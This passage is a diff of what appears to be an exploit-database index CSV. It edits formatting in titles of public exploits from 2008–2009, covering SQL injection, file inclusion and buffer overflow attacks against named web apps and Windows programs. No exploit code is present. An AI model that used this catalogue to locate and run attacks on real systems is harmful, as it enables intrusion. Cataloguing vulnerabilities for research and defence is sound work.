Vulnerabilities",2008-12-24,x0r,php,webapps,0 -7570,platforms/php/webapps/7570.txt,"ILIAS <= 3.7.4 (ref_id) Blind SQL Injection",2008-12-24,Lidloses_Auge,php,webapps,0 +7570,platforms/php/webapps/7570.txt,"ILIAS <= 3.7.4 - (ref_id) Blind SQL Injection",2008-12-24,Lidloses_Auge,php,webapps,0 7571,platforms/windows/dos/7571.txt,"BulletProof FTP Client 2.63 - Local Heap Overflow PoC",2008-12-24,His0k4,windows,dos,0 7572,platforms/php/webapps/7572.txt,"Joomla Component Ice Gallery 0.5b2 - (catid) Blind SQL Injection",2008-12-24,boom3rang,php,webapps,0 7573,platforms/php/webapps/7573.txt,"Joomla Component Live Ticker 1.0 - (tid) Blind SQL Injection",2008-12-24,boom3rang,php,webapps,0 @@ -7119,17 +7119,17 @@ id,file,description,date,author,platform,type,port 7576,platforms/php/webapps/7576.pl,"PHP-Fusion <= 7.0.2 - Remote Blind SQL Injection Exploit",2008-12-24,StAkeR,php,webapps,0 7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft <= 4.2 - Universal Stack Overflow Exploit (SEH)",2008-12-24,SkD,windows,local,0 7578,platforms/windows/dos/7578.pl,"SAWStudio 3.9i (prf File) Local Buffer Overflow PoC",2008-12-24,"Encrypt3d.M!nd ",windows,dos,0 -7579,platforms/php/webapps/7579.txt,"ClaSS <= 0.8.60 (export.php ftype) Local File Inclusion",2008-12-24,fuzion,php,webapps,0 -7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 (lang) Local File Inclusion",2008-12-24,fuzion,php,webapps,0 +7579,platforms/php/webapps/7579.txt,"ClaSS <= 0.8.60 - (export.php ftype) Local File Inclusion",2008-12-24,fuzion,php,webapps,0 +7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 - (lang) Local File Inclusion",2008-12-24,fuzion,php,webapps,0 7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - protosw kernel Local Privledge Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - (MAP File) Local SEH Overwrite Exploit",2008-12-28,Cnaph,windows,local,0 7583,platforms/windows/remote/7583.pl,"Microsoft Internet Explorer XML Parsing Buffer Overflow Exploit",2008-12-28,"Jeremy Brown",windows,remote,0 7584,platforms/windows/remote/7584.pl,"Amaya Web Browser <= 11.0.1 - Remote Buffer Overflow Exploit (vista)",2008-12-28,SkD,windows,remote,0 7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0 -7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 (Auth Bypass) SQL Injection",2008-12-28,bizzit,php,webapps,0 +7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - (Auth Bypass) SQL Injection",2008-12-28,bizzit,php,webapps,0 7587,platforms/php/webapps/7587.txt,"Joomla Component PAX Gallery 0.1 - Blind SQL Injection",2008-12-28,XaDoS,php,webapps,0 7589,platforms/windows/dos/7589.pl,"BulletProof FTP Client - (.bps) Local Stack Overflow PoC",2008-12-28,Stack,windows,dos,0 -7592,platforms/windows/dos/7592.pl,"Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow PoC",2008-12-28,"Encrypt3d.M!nd ",windows,dos,0 +7592,platforms/windows/dos/7592.pl,"Hex Workshop 5.1.4 - (Color Mapping File) Local Buffer Overflow PoC",2008-12-28,"Encrypt3d.M!nd ",windows,dos,0 7593,platforms/php/webapps/7593.pl,"DeluxeBB <= 1.2 - Remote Blind SQL Injection Exploit",2008-12-28,StAkeR,php,webapps,0 7594,platforms/windows/remote/7594.html,"Chilkat FTP ActiveX (SaveLastError) Insecure Method Exploit",2008-12-28,callAX,windows,remote,0 7595,platforms/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Admin Bypass",2008-12-28,k3yv4n,php,webapps,0 @@ -7139,7 +7139,7 @@ id,file,description,date,author,platform,type,port 7599,platforms/asp/webapps/7599.txt,"ForumApp 3.3 - Remote Database Disclosure",2008-12-28,Cyber.Zer0,asp,webapps,0 7600,platforms/php/webapps/7600.pl,"Flexphplink Pro Arbitrary File Upload Exploit",2008-12-28,Osirys,php,webapps,0 7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0 -7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 (Auth Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0 +7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - (Auth Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0 7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0 7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0 7605,platforms/php/webapps/7605.php,"TaskDriver <= 1.3 - Remote Change Admin Password Exploit",2008-12-29,cOndemned,php,webapps,0 @@ -7151,8 +7151,8 @@ id,file,description,date,author,platform,type,port 7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection Exploit",2008-12-29,s4avrd0w,php,webapps,0 7612,platforms/php/webapps/7612.txt,"Joomla Component com_na_content 1.0 - Blind SQL Injection",2008-12-29,"Mehmet Ince",php,webapps,0 7613,platforms/asp/webapps/7613.txt,"Sepcity Classified (classdis.asp ID) SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0 -7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 (Auth Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0 -7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 (Auth Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0 +7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - (Auth Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0 +7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - (Auth Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0 7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - (Auth Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0 7617,platforms/windows/remote/7617.html,"SasCam WebCam Server 2.6.5 - ActiveX Remote BoF Exploit",2008-12-29,callAX,windows,remote,0 7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure Exploit",2008-12-29,"Jon Oberheide",linux,local,0 @@ -7160,48 +7160,48 @@ id,file,description,date,author,platform,type,port 7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary Remote File Upload Exploit",2008-12-29,siurek22,php,webapps,0 7621,platforms/php/webapps/7621.txt,"PHPAlumni (Acomment.php id) SQL Injection",2008-12-29,Mr.SQL,php,webapps,0 7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 Admin Login Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0 -7623,platforms/windows/remote/7623.html,"Megacubo 5.0.7 (mega://) Remote eval() Injection Exploit",2008-12-30,Nine:Situations:Group,windows,remote,0 +7623,platforms/windows/remote/7623.html,"Megacubo 5.0.7 - (mega://) Remote eval() Injection Exploit",2008-12-30,Nine:Situations:Group,windows,remote,0 7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - (Auth Bypass) SQL Injection",2008-12-30,S.W.A.T.,php,webapps,0 7625,platforms/php/webapps/7625.txt,"CMScout 2.06 SQL Injection/Local File Inclusion Vulnerabilities",2008-12-30,SirGod,php,webapps,0 7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script (editid1) Blind SQL Injection",2008-12-30,x0r,php,webapps,0 7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - Remote SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0 7628,platforms/php/webapps/7628.txt,"viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0 7629,platforms/php/webapps/7629.txt,"DDL-Speed Script (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0 -7630,platforms/windows/remote/7630.html,"Megacubo 5.0.7 (mega://) Remote File Download and Execute Exploit",2009-01-01,JJunior,windows,remote,0 +7630,platforms/windows/remote/7630.html,"Megacubo 5.0.7 - (mega://) Remote File Download and Execute Exploit",2009-01-01,JJunior,windows,remote,0 7631,platforms/php/webapps/7631.txt,"2Capsule - (sticker.php id) Remote SQL Injection",2009-01-01,Zenith,php,webapps,0 7632,platforms/hardware/dos/7632.txt,"Nokia S60 SMS/MMS (Curse of Silence) - Denial of Service",2009-01-01,"Tobias Engel",hardware,dos,0 7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 Change Admin Pass CSRF",2009-01-01,x0r,php,webapps,0 7634,platforms/windows/dos/7634.pl,"Audacity 1.2.6 - (.gro) Local Buffer Overflow PoC",2009-01-01,Houssamix,windows,dos,0 -7635,platforms/php/webapps/7635.txt,"ASPThai.Net Webboard 6.0 (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0 -7636,platforms/php/webapps/7636.pl,"PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit",2009-01-01,KinG-LioN,php,webapps,0 +7635,platforms/php/webapps/7635.txt,"ASPThai.Net Webboard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0 +7636,platforms/php/webapps/7636.pl,"PHPFootball <= 1.6 - (filter.php) Remote Hash Disclosure Exploit",2009-01-01,KinG-LioN,php,webapps,0 7637,platforms/windows/dos/7637.pl,"Elecard MPEG Player 5.5 - (.m3u) Stack Buffer Overflow PoC",2009-01-01,"aBo MoHaMeD",windows,dos,0 7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote PHP File Upload",2009-01-01,Lo$er,php,webapps,0 -7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0 -7640,platforms/php/webapps/7640.txt,"w3blabor CMS <= 3.3.0 (Admin Bypass) SQL Injection",2009-01-01,DNX,php,webapps,0 -7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 (news.php newsid) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 +7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0 +7640,platforms/php/webapps/7640.txt,"w3blabor CMS <= 3.3.0 - (Admin Bypass) SQL Injection",2009-01-01,DNX,php,webapps,0 +7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - (news.php newsid) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a (Auth Bypass) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 7643,platforms/multiple/dos/7643.txt,"Konqueror 4.1 - XSS / Remote Crash Vulnerabilities",2009-01-01,StAkeR,multiple,dos,0 7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Remote File Upload",2009-01-02,ZoRLu,php,webapps,0 7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Remote File Upload",2009-01-02,ZoRLu,php,webapps,0 7646,platforms/multiple/local/7646.txt,"PHP <= 5.2.8 gd library - imageRotate() Information Leak",2009-01-02,"Hamid Ebadi",multiple,local,0 -7647,platforms/multiple/dos/7647.txt,"VMware <= 2.5.1 (Vmware-authd) Remote Denial of Service Exploit",2009-01-02,"laurent gaffié ",multiple,dos,0 +7647,platforms/multiple/dos/7647.txt,"VMware <= 2.5.1 - (Vmware-authd) Remote Denial of Service Exploit",2009-01-02,"laurent gaffié ",multiple,dos,0 7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - (RFI/LFI/XSS) Multiple Vulnerabilities",2009-01-02,ahmadbady,php,webapps,0 7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - (.m3u) Local Buffer Overflow PoC",2009-01-02,"aBo MoHaMeD",windows,dos,0 7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection Exploit",2009-01-03,darkjoker,php,webapps,0 7651,platforms/windows/local/7651.py,"Destiny Media Player 1.61 - (.m3u) Local Stack Overflow Exploit",2009-01-03,His0k4,windows,local,0 7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow PoC",2009-01-03,"Encrypt3d.M!nd ",windows,dos,0 -7653,platforms/php/webapps/7653.txt,"Webspell 4 (Auth Bypass) SQL Injection",2009-01-03,anonymous,php,webapps,0 +7653,platforms/php/webapps/7653.txt,"Webspell 4 - (Auth Bypass) SQL Injection",2009-01-03,anonymous,php,webapps,0 7654,platforms/windows/local/7654.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit",2009-01-04,"Encrypt3d.M!nd ",windows,local,0 7655,platforms/windows/local/7655.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (2)",2009-01-04,sCORPINo,windows,local,0 7656,platforms/windows/local/7656.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (3)",2009-01-04,Houssamix,windows,local,0 -7657,platforms/php/webapps/7657.txt,"webSPELL <= 4.01.02 (id) Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0 +7657,platforms/php/webapps/7657.txt,"webSPELL <= 4.01.02 - (id) Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0 7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion Exploit",2009-01-04,StAkeR,php,webapps,0 -7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 (search) Remote SQL Injection",2009-01-04,DaiMon,php,webapps,0 -7660,platforms/php/webapps/7660.txt,"PhpMesFilms 1.0 (index.php id) Remote SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0 +7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - (search) Remote SQL Injection",2009-01-04,DaiMon,php,webapps,0 +7660,platforms/php/webapps/7660.txt,"PhpMesFilms 1.0 - (index.php id) Remote SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0 7661,platforms/windows/local/7661.pl,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (4)",2009-01-04,Stack,windows,local,0 7662,platforms/windows/local/7662.py,"Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (5)",2009-01-04,suN8Hclf,windows,local,0 -7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 (id) Remote SQL Injection",2009-01-04,ZoRLu,php,webapps,0 -7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 (viewarticle.php id) Blind SQL Injection Exploit",2009-01-04,darkjoker,php,webapps,0 +7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - (id) Remote SQL Injection",2009-01-04,ZoRLu,php,webapps,0 +7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - (viewarticle.php id) Blind SQL Injection Exploit",2009-01-04,darkjoker,php,webapps,0 7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - (acc.mdb) Database Disclosure",2009-01-05,ByALBAYX,asp,webapps,0 7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - (Auth Bypass) SQL Injection",2009-01-05,ByALBAYX,asp,webapps,0 7667,platforms/php/webapps/7667.txt,"Joomla Component simple_review 1.x SQL Injection",2009-01-05,EcHoLL,php,webapps,0 @@ -7216,33 +7216,33 @@ id,file,description,date,author,platform,type,port 7676,platforms/multiple/local/7676.txt,"Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit",2009-01-06,sh2kerr,multiple,local,0 7677,platforms/multiple/local/7677.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit (1)",2009-01-06,sh2kerr,multiple,local,0 7678,platforms/php/webapps/7678.txt,"PHPAuctionSystem Multiple Remote File Inclusion Vulnerabilities",2009-01-06,darkmasking,php,webapps,0 -7679,platforms/php/webapps/7679.php,"RiotPix <= 0.61 (forumid) Blind SQL Injection Exploit",2009-01-06,cOndemned,php,webapps,0 +7679,platforms/php/webapps/7679.php,"RiotPix <= 0.61 - (forumid) Blind SQL Injection Exploit",2009-01-06,cOndemned,php,webapps,0 7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - (XSS/SQL) Multiple Vulnerabilities",2009-01-06,!-BUGJACK-!,php,webapps,0 7681,platforms/linux/local/7681.txt,"Debian GNU/Linux XTERM (DECRQSS/comments) Weakness",2009-01-06,"Paul Szabo",linux,local,0 -7682,platforms/php/webapps/7682.txt,"RiotPix <= 0.61 (Auth Bypass) SQL Injection",2009-01-06,ZoRLu,php,webapps,0 -7683,platforms/php/webapps/7683.pl,"Goople <= 1.8.2 (frontpage.php) Blind SQL Injection Exploit",2009-01-06,darkjoker,php,webapps,0 +7682,platforms/php/webapps/7682.txt,"RiotPix <= 0.61 - (Auth Bypass) SQL Injection",2009-01-06,ZoRLu,php,webapps,0 +7683,platforms/php/webapps/7683.pl,"Goople <= 1.8.2 - (frontpage.php) Blind SQL Injection Exploit",2009-01-06,darkjoker,php,webapps,0 7684,platforms/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow Exploit",2009-01-06,"Encrypt3d.M!nd ",windows,local,0 -7685,platforms/multiple/dos/7685.pl,"SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit",2009-01-06,StAkeR,multiple,dos,0 +7685,platforms/multiple/dos/7685.pl,"SeaMonkey <= 1.1.14 - (marquee) Denial of Service Exploit",2009-01-06,StAkeR,multiple,dos,0 7686,platforms/php/webapps/7686.txt,"ItCMS <= 2.1a (Auth Bypass) SQL Injection",2009-01-06,certaindeath,php,webapps,0 7687,platforms/php/webapps/7687.txt,"playSms 0.9.3 - Multiple Remote/Local File Inclusion Vulnerabilities",2009-01-06,ahmadbady,php,webapps,0 -7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 (Cisco IOS-MD5) Local Buffer Overflow Exploit",2009-01-07,send9,windows,local,0 +7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 - (Cisco IOS-MD5) Local Buffer Overflow Exploit",2009-01-07,send9,windows,local,0 7689,platforms/php/webapps/7689.txt,"BlogHelper (common_db.inc) Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0 7690,platforms/php/webapps/7690.txt,"PollHelper (poll.inc) Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0 -7691,platforms/php/webapps/7691.php,"Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal",2009-01-07,irk4z,php,webapps,0 +7691,platforms/php/webapps/7691.php,"Joomla <= 1.5.8 - (xstandard editor) Local Directory Traversal",2009-01-07,irk4z,php,webapps,0 7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - (PlaylistSkin) Buffer Overflow Exploit",2009-01-07,"Jeremy Brown",windows,local,0 -7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 (user) Remote Buffer Overflow PoC",2009-01-07,Houssamix,windows,dos,0 +7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 - (user) Remote Buffer Overflow PoC",2009-01-07,Houssamix,windows,dos,0 7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - (.aup) Remote off by one Crash Exploit",2009-01-07,Stack,windows,dos,0 7695,platforms/windows/local/7695.pl,"VUPlayer <= 2.49 - (.PLS) Universal Buffer Overflow Exploit",2009-01-07,SkD,windows,local,0 7696,platforms/windows/dos/7696.pl,"WinAmp GEN_MSN Plugin - Heap Buffer Overflow PoC",2009-01-07,SkD,windows,dos,0 7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 -7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 +7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - (items.php CA) SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 7699,platforms/php/webapps/7699.txt,"QuoteBook (poll.inc) Remote Config File Disclosure",2009-01-07,Moudi,php,webapps,0 -7700,platforms/php/webapps/7700.php,"CuteNews <= 1.4.6 (ip ban) XSS/Command Execution Exploit (adm req.)",2009-01-08,StAkeR,php,webapps,0 +7700,platforms/php/webapps/7700.php,"CuteNews <= 1.4.6 - (ip ban) XSS/Command Execution Exploit (adm req.)",2009-01-08,StAkeR,php,webapps,0 7701,platforms/linux/remote/7701.txt,"Samba < 3.0.20 - Remote Heap Overflow Exploit",2009-01-08,zuc,linux,remote,445 7702,platforms/windows/local/7702.c,"GOM Player 2.0.12.3375 - (.ASX) Stack Overflow Exploit",2009-01-08,DATA_SNIPER,windows,local,0 -7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 (comment_id) SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0 -7704,platforms/php/webapps/7704.pl,"Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit",2009-01-08,darkjoker,php,webapps,0 -7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit",2009-01-08,StAkeR,php,webapps,0 +7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0 +7704,platforms/php/webapps/7704.pl,"Pizzis CMS <= 1.5.1 - (visualizza.php idvar) Blind SQL Injection Exploit",2009-01-08,darkjoker,php,webapps,0 +7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution Exploit",2009-01-08,StAkeR,php,webapps,0 7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext <= 1.2.0-RC1 mIRC script",2009-01-08,Phil,windows,remote,0 7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog SEH Overflow Exploit",2009-01-08,Cnaph,windows,local,0 7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - (.mp3) Local Heap Overflow PoC",2009-01-09,Houssamix,windows,dos,0 @@ -7259,18 +7259,18 @@ id,file,description,date,author,platform,type,port 7719,platforms/php/webapps/7719.txt,"Fast Guest Book (Auth Bypass) SQL Injection",2009-01-11,Moudi,php,webapps,0 7720,platforms/windows/dos/7720.pl,"Microsoft Windows - (.CHM) Denial of Service (html compiled)",2009-01-11,securfrog,windows,dos,0 7721,platforms/windows/dos/7721.pl,"Browse3D 3.5 - (.sfs) Local Buffer Overflow PoC",2009-01-11,Houssamix,windows,dos,0 -7722,platforms/php/webapps/7722.txt,"DZcms 3.1 (products.php pcat) Remote SQL Injection",2009-01-11,"Glafkos Charalambous ",php,webapps,0 +7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - (products.php pcat) Remote SQL Injection",2009-01-11,"Glafkos Charalambous ",php,webapps,0 7723,platforms/php/webapps/7723.txt,"Seo4SMF for SMF forums - Multiple Vulnerabilities",2009-01-11,WHK,php,webapps,0 -7724,platforms/php/webapps/7724.php,"phpMDJ <= 1.0.3 (id_animateur) Blind SQL Injection Exploit",2009-01-11,darkjoker,php,webapps,0 +7724,platforms/php/webapps/7724.php,"phpMDJ <= 1.0.3 - (id_animateur) Blind SQL Injection Exploit",2009-01-11,darkjoker,php,webapps,0 7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - (open_book.php book_sn) SQL Injection",2009-01-11,stylextra,php,webapps,0 -7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 (Auth Bypass) SQL Injection",2009-01-11,SirGod,php,webapps,0 +7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - (Auth Bypass) SQL Injection",2009-01-11,SirGod,php,webapps,0 7727,platforms/windows/local/7727.pl,"Microsoft HTML Workshop <= 4.74 - Universal Buffer Overflow Exploit",2009-01-12,SkD,windows,local,0 7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - (Auth Bypass) SQL Injection",2009-01-11,x0r,php,webapps,0 7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax (comment_id) SQL Injection",2009-01-11,FasTWORM,php,webapps,0 7730,platforms/php/webapps/7730.txt,"Social Engine (browse_classifieds.php s) SQL Injection",2009-01-11,snakespc,php,webapps,0 7731,platforms/php/webapps/7731.txt,"fttss <= 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0 7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion Exploit",2009-01-11,"Danny Moules",php,webapps,0 -7733,platforms/php/webapps/7733.txt,"Photobase 1.2 (language) Local File Inclusion",2009-01-11,Osirys,php,webapps,0 +7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - (language) Local File Inclusion",2009-01-11,Osirys,php,webapps,0 7734,platforms/php/webapps/7734.txt,"Joomla Component Portfol (vcatid) SQL Injection",2009-01-12,H!tm@N,php,webapps,0 7735,platforms/php/webapps/7735.pl,"Simple Machines Forum <= 1.0.13 / <= 1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps,0 7736,platforms/asp/webapps/7736.htm,"Comersus Shopping Cart <= 6.0 - Remote User Pass Exploit",2009-01-12,ajann,asp,webapps,0 @@ -7280,23 +7280,23 @@ id,file,description,date,author,platform,type,port 7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Remote File Upload",2009-01-12,ahmadbady,php,webapps,0 7741,platforms/asp/webapps/7741.txt,"dMx READY (25 Products) Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0 7742,platforms/windows/dos/7742.txt,"Winamp <= 5.541 - (mp3/aiff) Multiple Denial of Service Exploits",2009-01-12,securfrog,windows,dos,0 -7743,platforms/php/webapps/7743.txt,"Realtor 747 (define.php INC_DIR) Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0 +7743,platforms/php/webapps/7743.txt,"Realtor 747 - (define.php INC_DIR) Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0 7744,platforms/asp/webapps/7744.txt,"Virtual GuestBook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps,0 7745,platforms/windows/local/7745.py,"VUPlayer 2.49 - (.asx) (Universal) Local Buffer Overflow Exploit",2009-01-13,"Encrypt3d.M!nd ",windows,local,0 7746,platforms/php/webapps/7746.txt,"Joomla Component com_gigcal (gigcal_gigs_id) 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0 7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX (Save) Remote File Overwrite Exploit",2009-01-13,Houssamix,windows,remote,0 -7748,platforms/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 (Save) Remote File Overwrite Exploit",2009-01-13,Houssamix,windows,remote,0 +7748,platforms/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - (Save) Remote File Overwrite Exploit",2009-01-13,Houssamix,windows,remote,0 7749,platforms/windows/remote/7749.html,"Office Viewer ActiveX Control 3.0.1 - Remote File Execution Exploit",2009-01-13,Houssamix,windows,remote,0 7750,platforms/windows/dos/7750.html,"PowerPoint Viewer OCX 3.1 - Remote File Overwrite Exploit",2009-01-13,Stack,windows,dos,0 7751,platforms/windows/dos/7751.pl,"dBpowerAMP Audio Player 2 - (.pls) Local Buffer Overflow PoC",2009-01-13,Stack,windows,dos,0 7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager <= 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0 -7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 (cilla.cgi) Remote Command Execution Exploit",2009-01-13,ZeN,cgi,webapps,0 +7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - (cilla.cgi) Remote Command Execution Exploit",2009-01-13,ZeN,cgi,webapps,0 7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager <= 1.1 Contents Change",2009-01-13,ajann,asp,webapps,0 7755,platforms/windows/remote/7755.html,"PowerPoint Viewer OCX 3.1 - Remote File Execution Exploit",2009-01-13,Cyber-Zone,windows,remote,0 -7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 (CWD) Remote Memory Consumption Exploit",2009-01-13,His0k4,windows,dos,0 +7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 - (CWD) Remote Memory Consumption Exploit",2009-01-13,His0k4,windows,dos,0 7757,platforms/windows/remote/7757.html,"Word Viewer OCX 3.2 - Remote File Execution Exploit",2009-01-13,Stack,windows,remote,0 7758,platforms/php/webapps/7758.txt,"Dark Age CMS <= 0.2c Beta - (Auth Bypass) SQL Injection",2009-01-13,darkjoker,php,webapps,0 -7759,platforms/php/webapps/7759.txt,"Syzygy CMS <= 0.3 (Auth Bypass) SQL Injection",2009-01-14,darkjoker,php,webapps,0 +7759,platforms/php/webapps/7759.txt,"Syzygy CMS <= 0.3 - (Auth Bypass) SQL Injection",2009-01-14,darkjoker,php,webapps,0 7760,platforms/multiple/remote/7760.php,"TeamSpeak <= 2.0.23.17 - Remote File Disclosure",2009-01-14,c411k,multiple,remote,0 7761,platforms/asp/webapps/7761.txt,"netvolution CMS 1.0 - (XSS/SQL) Multiple Vulnerabilities",2009-01-14,Ellinas,asp,webapps,0 